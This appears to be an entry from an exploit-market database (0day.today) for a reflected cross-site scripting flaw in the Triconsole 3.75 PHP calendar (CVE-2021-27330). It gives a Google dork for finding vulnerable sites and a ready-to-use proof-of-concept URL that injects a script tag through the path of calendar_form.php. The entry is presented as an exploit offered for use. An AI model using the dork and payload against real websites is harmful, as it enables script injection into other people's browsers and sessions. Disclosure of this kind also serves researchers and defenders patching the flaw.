[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Triconsole 3.75 - Reflected XSS Vulnerability

Author
Akash Chathoth
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-35867
Category
web applications
Date add
26-02-2021
CVE
CVE-2021-27330
Platform
php
# Exploit Title: Triconsole 3.75 - Reflected XSS
# Google Dork: inurl : /calendar/calendar_form.php
# Exploit Author: Akash Chathoth
# Vendor Homepage: http://www.triconsole.com/
# Software Link: http://www.triconsole.com/php/calendar_datepicker.php
# Version: < 3.76 (14 February 2021)
# Tested on: 3.75
# CVE: 2021-27330

# Exploit : http://exapmle.com/calendar_form.php/"><script>alert(document.domain)</script>


#  0day.today [2024-11-15]  #